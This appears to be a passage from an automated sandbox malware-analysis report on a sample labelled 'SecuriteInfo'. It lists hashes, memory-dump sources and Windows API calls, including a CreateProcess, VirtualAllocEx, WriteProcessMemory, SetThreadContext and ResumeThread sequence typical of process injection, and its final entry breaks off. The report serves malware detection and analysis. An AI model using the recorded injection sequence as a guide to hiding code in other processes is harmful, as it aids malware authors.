                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 4063778783-0
                                                                                          • Opcode ID: fecfbca1c8ebeff65d1861538b09ee496e1aea429e1419fb7db0af1f28598095
                                                                                          • Instruction ID: a39ffed55a5a188f7b8a604f85c1f80216c418eb8925e4ea7f0b9c0aa94fc6a5
                                                                                          • Opcode Fuzzy Hash: fecfbca1c8ebeff65d1861538b09ee496e1aea429e1419fb7db0af1f28598095
                                                                                          • Instruction Fuzzy Hash: 8901C874504208AFD708DF94E890DAAB7F5FF58300B51C1ADDD1A4B750EB30EA05CB95
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TJcq$Te^q
                                                                                          • API String ID: 0-918715239
                                                                                          • Opcode ID: 19c5d01759292fd65d367951ded5bd7a31d5aaeba5f62651ae787a485d001be8
                                                                                          • Instruction ID: 84d1fc4721c848042062c08b180db5935b8956702af1fab86a5cd49b98ee4875
                                                                                          • Opcode Fuzzy Hash: 19c5d01759292fd65d367951ded5bd7a31d5aaeba5f62651ae787a485d001be8
                                                                                          • Instruction Fuzzy Hash: 9631F131A093818FC716977888557AE7FB2EF87200F1905DFC086DB3A3DA294C0983A2
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,6D018C13,?,6D018CD3,?,6D018C13,00000000,?,?,6D018C13,?,?), ref: 6D018D73
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,6D018CD3,?,6D018C13,00000000,?,?,6D018C13,?,?), ref: 6D018D8C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: f0e93837a51a454c0cbb7e780b3f315a1e3d6bd722dc63ccffc0e87f32b6b74b
                                                                                          • Instruction ID: 9e24d3ec9bec0671b9e39908efecaa81be9b1bd02bd0777a263d457d23106708
                                                                                          • Opcode Fuzzy Hash: f0e93837a51a454c0cbb7e780b3f315a1e3d6bd722dc63ccffc0e87f32b6b74b
                                                                                          • Instruction Fuzzy Hash: 7C21167520410AAFCB04CF88D890EAEB3FAFFC9210B118649F90687340C730EE16CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TJcq$Te^q
                                                                                          • API String ID: 0-918715239
                                                                                          • Opcode ID: ed5e7c90271f2c8068482c7a0e78cd4de84caf4b18d905eef2a7ca0ef29191fd
                                                                                          • Instruction ID: 57da44dc1c395e8ed5e1d280e1e21e48cb4e8054dc4f235c108836f6abc4e891
                                                                                          • Opcode Fuzzy Hash: ed5e7c90271f2c8068482c7a0e78cd4de84caf4b18d905eef2a7ca0ef29191fd
                                                                                          • Instruction Fuzzy Hash: 43110330B001154BCB18ABA994587BFBBE6FFC8640F10446DD50AAB394CE359D0587E2
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,6D016890,?), ref: 6D018BDD
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6D018C23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: 7b3da5219bbd519c06ddc3f0577f64efc57ebc719d6a03cfcad60b45dab99098
                                                                                          • Instruction ID: 356a9f94739b40d5a6684f6b761614b34cfae109798cd58ca6026e4a7121bf1f
                                                                                          • Opcode Fuzzy Hash: 7b3da5219bbd519c06ddc3f0577f64efc57ebc719d6a03cfcad60b45dab99098
                                                                                          • Instruction Fuzzy Hash: 48019A71709104AFDB00DFA8C880A9AF3A9FB9D200710426AEA05C7300DB32EE51CBD1
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0543BCFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 89f74fec073db51d30e55540aa0c941393f8997f02cf509bfcd04c583239c609
                                                                                          • Instruction ID: 842382884e77f5928eaff658ddd4bfb2551947676ddfff87bb3aba70316d6fa9
                                                                                          • Opcode Fuzzy Hash: 89f74fec073db51d30e55540aa0c941393f8997f02cf509bfcd04c583239c609
                                                                                          • Instruction Fuzzy Hash: 05B11570D042588FDB10CFA8C986BEEBBB1FB09304F1481AAD859A72A0DB749985CF45
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0543BCFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 09c267cb20328c479fbc1eab0b5e2e232a721f62cb449074a56de7d5f6e3cb96
                                                                                          • Instruction ID: d9d074e3bc1c2c8643699101190c6404696ac353664ff847a17aa9624ca0205d
                                                                                          • Opcode Fuzzy Hash: 09c267cb20328c479fbc1eab0b5e2e232a721f62cb449074a56de7d5f6e3cb96
                                                                                          • Instruction Fuzzy Hash: D7B10570D042588FDB10CFA8C946BEEBBB1FB49304F14916AD859A72A0DB749985CF45
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0543C225
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: a9ba53084e9431fdd5c110724bcc0031bcfefc1dc4480416410a52047ffdfb3c
                                                                                          • Instruction ID: badf77cb5c12c381dc8781cf353d252bda177446c577b286304ddf984c8f6603
                                                                                          • Opcode Fuzzy Hash: a9ba53084e9431fdd5c110724bcc0031bcfefc1dc4480416410a52047ffdfb3c
                                                                                          • Instruction Fuzzy Hash: 484177B5D042589FCB00CFA9D984AEEFBF1BF09310F24942AE818BB210D375A945CF64
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0543C225
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 83018b0459b0c46b0fb90e413c7da3a712c36e09f6aefafc4187945c18039c96
                                                                                          • Instruction ID: 9d06a0e9219f5a3b369c375553da559bfae24bf9325aefd36af6ef4491753961
                                                                                          • Opcode Fuzzy Hash: 83018b0459b0c46b0fb90e413c7da3a712c36e09f6aefafc4187945c18039c96
                                                                                          • Instruction Fuzzy Hash: B84167B5D042589FCB04CFA9D984ADEFBF1BF49310F24942AE818BB250D375A945CF64
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0543C0DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 2ce2a1ed17c71835e1339b94ad3128be6ead6b616d71a7167d222d7a9b1752af
                                                                                          • Instruction ID: 2d96be2c6f549c498bd1099eac9fc70655a123219f2e0012e72828a68c0bc4d9
                                                                                          • Opcode Fuzzy Hash: 2ce2a1ed17c71835e1339b94ad3128be6ead6b616d71a7167d222d7a9b1752af
                                                                                          • Instruction Fuzzy Hash: 174166B9D002589FCF10CFA9D984A9EFBB1AB09310F14902AE918B7320D775A941CF68
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0543C0DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 24708999ca79033445819ff1a9da8cab969afcdb23006511dcce5b3343b6ba52
                                                                                          • Instruction ID: 242ae69ed592e7e031c872705b87a65e8e913e4e5992814876746d475c5e766b
                                                                                          • Opcode Fuzzy Hash: 24708999ca79033445819ff1a9da8cab969afcdb23006511dcce5b3343b6ba52
                                                                                          • Instruction Fuzzy Hash: 2E3156B9D052589FCF10CFA9D984A9EFBF1BB09310F10902AE818B7220D775A941CF64
                                                                                          APIs
                                                                                            • Part of subcall function 6D032820: _malloc.LIBCMT ref: 6D032871
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D0171D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xweak_mallocstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 4085767713-0
                                                                                          • Opcode ID: 5e94676a8414f145ae3434f2304005e8e70a98099a4b084cd68e6e7bd15e2c64
                                                                                          • Instruction ID: 1ebfa1e2ef66532b2a20f41ee3408cbe0e44e325d4338a51756fb5f4f5b29edb
                                                                                          • Opcode Fuzzy Hash: 5e94676a8414f145ae3434f2304005e8e70a98099a4b084cd68e6e7bd15e2c64
                                                                                          • Instruction Fuzzy Hash: 95315AB4A0874ADFDB10CFA9C880BAAB7F9FF89204B10865DE81697741D731E905CB90
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0543BFBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 58eec2d7d64d669e7a0d6001252e4dd3ebd5803e009a0bd357b0214a68b10af8
                                                                                          • Instruction ID: e642b2994f53a2f0bff89d6d30f9516880298cbf8305fd686d3a70ab2efd77d8
                                                                                          • Opcode Fuzzy Hash: 58eec2d7d64d669e7a0d6001252e4dd3ebd5803e009a0bd357b0214a68b10af8
                                                                                          • Instruction Fuzzy Hash: 4131B9B9D052589FCB10CFA9D584ADEFBF0EB49310F24906AE818B7310D335AA45CF68
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 0543213A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: a22ba2558f1a65290ab48bbf9d9da55c106e2933450f4ed3f0366612cc4b074b
                                                                                          • Instruction ID: 52e226cc4cd8e1e82e1989b4e5290c83886fc5cb09d58b9e0402764c34b7768b
                                                                                          • Opcode Fuzzy Hash: a22ba2558f1a65290ab48bbf9d9da55c106e2933450f4ed3f0366612cc4b074b
                                                                                          • Instruction Fuzzy Hash: E831DBB8D042189FCB14CFA9D984ADEFBF5BB49314F24806AE918B7320D374A945CF64
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 0543213A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 6c524f77f612eb8a476571ce53547d48d4fa7ddc0c66c998cf59aa523fa57adc
                                                                                          • Instruction ID: 9b692131efb77127a1be564a6244fa13aee600ed190a7b58096c2fcccb70759f
                                                                                          • Opcode Fuzzy Hash: 6c524f77f612eb8a476571ce53547d48d4fa7ddc0c66c998cf59aa523fa57adc
                                                                                          • Instruction Fuzzy Hash: 9731BAB8D042189FCB14CFA9D985ADEFBF1AB49314F14806AE918B7320D374A945CFA4
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0543BFBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 9e689c554474765e59e6ec531cd637233cf90970d50c9114937635cce007d6cf
                                                                                          • Instruction ID: 4f97b150e13f8b47eb5955f1a27ac3b52df7fcf6e2f6f47bf0e68a454e3f3f21
                                                                                          • Opcode Fuzzy Hash: 9e689c554474765e59e6ec531cd637233cf90970d50c9114937635cce007d6cf
                                                                                          • Instruction Fuzzy Hash: 5E31CAB4D012589FCB10CFA9D584ADEFBF0AB09310F20906AE818B7310C334A944CF64
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 0543C325
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 75152cad958e0026681d72278191848fe59beca066603797fa876223e7b87c66
                                                                                          • Instruction ID: 2621684cb111446f72f1df95c00dccdb655e621ad3491455edc6f6bdd5a4155c
                                                                                          • Opcode Fuzzy Hash: 75152cad958e0026681d72278191848fe59beca066603797fa876223e7b87c66
                                                                                          • Instruction Fuzzy Hash: 773198B5D012589FCB10DFA9E985ADEFBF4BB09314F10902AE818B7310D735A941CFA8
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 0543C325
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: a8d14c20a2a236e2a639d8a2bfd1f50c05f75e26582d5216c7e07b85ef78ebc4
                                                                                          • Instruction ID: a88ddd7eb82299847bcbf55b71c3564ca33c583224f57eb57078eb355c634168
                                                                                          • Opcode Fuzzy Hash: a8d14c20a2a236e2a639d8a2bfd1f50c05f75e26582d5216c7e07b85ef78ebc4
                                                                                          • Instruction Fuzzy Hash: 2C3178B4D012589FCB10CFA9D585ADEFBF4BB49314F10906AE818B7310D775A941CF64
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • SysAllocString.OLEAUT32 ref: 6D02EA8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 959018026-0
                                                                                          • Opcode ID: 1a40a4e43b7733bd9c5ce32c95681345f7470674bfa21b6f5d5f18dcbec0b270
                                                                                          • Instruction ID: 4a21b576ba546f3e69a20346ec7743addeca354cb8ce0898abf29368f165b9a7
                                                                                          • Opcode Fuzzy Hash: 1a40a4e43b7733bd9c5ce32c95681345f7470674bfa21b6f5d5f18dcbec0b270
                                                                                          • Instruction Fuzzy Hash: 8A0192B2845B55EBE720CF64C900BAAB7F8FB05B24F11432AEC15E7780D7B5A900CAD4
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 6D06E8DC
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 529455676-0
                                                                                          • Opcode ID: 2e88de33e5d679a3d34dc66451477a82b21ce7e65d9d5c8ab9ed72bd656eb47c
                                                                                          • Instruction ID: 89305c49312616552204cf934eeba5d0b1a884099c68071b1acd66b43d874297
                                                                                          • Opcode Fuzzy Hash: 2e88de33e5d679a3d34dc66451477a82b21ce7e65d9d5c8ab9ed72bd656eb47c
                                                                                          • Instruction Fuzzy Hash: 79D05E31518248DBEF41AB98D905B6D7FA4AB81325F918065E108BB280DE714E10877E
                                                                                          APIs
                                                                                          • ___security_init_cookie.LIBCMT ref: 6D06A510
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___security_init_cookie
                                                                                          • String ID:
                                                                                          • API String ID: 3657697845-0
                                                                                          • Opcode ID: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
                                                                                          • Instruction ID: a477bdcd43583e1ec9e556377cc830250478e386f956244eeed9e4ed1a16a668
                                                                                          • Opcode Fuzzy Hash: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
                                                                                          • Instruction Fuzzy Hash: 7CC09B351083489FDB04DF10F841D5E3B15EF94224721D115FE1C076509B319561D574
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8bq
                                                                                          • API String ID: 0-187764589
                                                                                          • Opcode ID: 4d2fe62b023db729755b5c28650f086cc230ed611893e4812600687de058d04e
                                                                                          • Instruction ID: 2fb087aa1004c35b17069f8495cf2698622b4ee590f94d799537a92c95491392
                                                                                          • Opcode Fuzzy Hash: 4d2fe62b023db729755b5c28650f086cc230ed611893e4812600687de058d04e
                                                                                          • Instruction Fuzzy Hash: 23313274D46209DFCF02DFA9E444AEEBBB9BF49314F50A029E409A7350DB349944CF90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Hbq
                                                                                          • API String ID: 0-1245868
                                                                                          • Opcode ID: 038a06687f192fdd841c42898bf8b463ae59393b06ae2714e1ed4cede31e4977
                                                                                          • Instruction ID: 1e56026af59237003a0f80fb562d63c65428e97fbd3b47ecf80a3e6e4ebe919e
                                                                                          • Opcode Fuzzy Hash: 038a06687f192fdd841c42898bf8b463ae59393b06ae2714e1ed4cede31e4977
                                                                                          • Instruction Fuzzy Hash: A721DF71A44204AFD7069B788C15BFA7FB6FF95340F10C09AE915DB284DA359A05CB51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e02b9d325b9888565ac765b7772213a3cbbc15eb952bbfde8910e0c044f0c4ad
                                                                                          • Instruction ID: 67dad494ca26a29542275b2e5abe455f8356aef3a46c2207eef65875a49d4f46
                                                                                          • Opcode Fuzzy Hash: e02b9d325b9888565ac765b7772213a3cbbc15eb952bbfde8910e0c044f0c4ad
                                                                                          • Instruction Fuzzy Hash: 9E010C353001109FC748EB6DD898D6EBBEAFF8966435144ADE10ACB371DE32EC018B94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b9b7b2e3116aefdafd28bcaf84282582784f698ddd7180e50d8f30e67aae67a5
                                                                                          • Instruction ID: fbe2cc5d023ab411ac098d338c4cb66806d190256a1e5f213ada207759e270a2
                                                                                          • Opcode Fuzzy Hash: b9b7b2e3116aefdafd28bcaf84282582784f698ddd7180e50d8f30e67aae67a5
                                                                                          • Instruction Fuzzy Hash: F611F378D4421A8FCB04DFA9D9556EEBBBAFF88300F00D52AD919A7744DB341A11CF91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763238454.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_137d000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e4ac350ba22cf8b1a9ce6338b5775b34023973eb4745c8d9893e4809bf5abfbd
                                                                                          • Instruction ID: 5bb425dc3a485a1f62566a2ea9de67afc5921d0e75f73a0c27270e97ba0bed53
                                                                                          • Opcode Fuzzy Hash: e4ac350ba22cf8b1a9ce6338b5775b34023973eb4745c8d9893e4809bf5abfbd
                                                                                          • Instruction Fuzzy Hash: E101A7711083449AF7719A59DD84767BF9CDF81328F18C52AED094A296C67D9840C671
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763238454.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_137d000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a68a2235ccc791ea14872be607601e3e771f0008386c0668998b0141f45ffe15
                                                                                          • Instruction ID: c5716f00e426d1c66d03ea0cb877e5e5afc4bcafba06dc1a641ce12407361499
                                                                                          • Opcode Fuzzy Hash: a68a2235ccc791ea14872be607601e3e771f0008386c0668998b0141f45ffe15
                                                                                          • Instruction Fuzzy Hash: 65F062715083449AF7218A1ADCC4B62FFA8EF81638F18C45AED484E286C2799844CAB1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b354f4936c9d9cba1e0f73f15abfa58418512852a5dbffe7433cdd7f611fd553
                                                                                          • Instruction ID: 124b35b9437e8859be170fb2f8c1da411238d6d1aa0d6563f75253f17bb84845
                                                                                          • Opcode Fuzzy Hash: b354f4936c9d9cba1e0f73f15abfa58418512852a5dbffe7433cdd7f611fd553
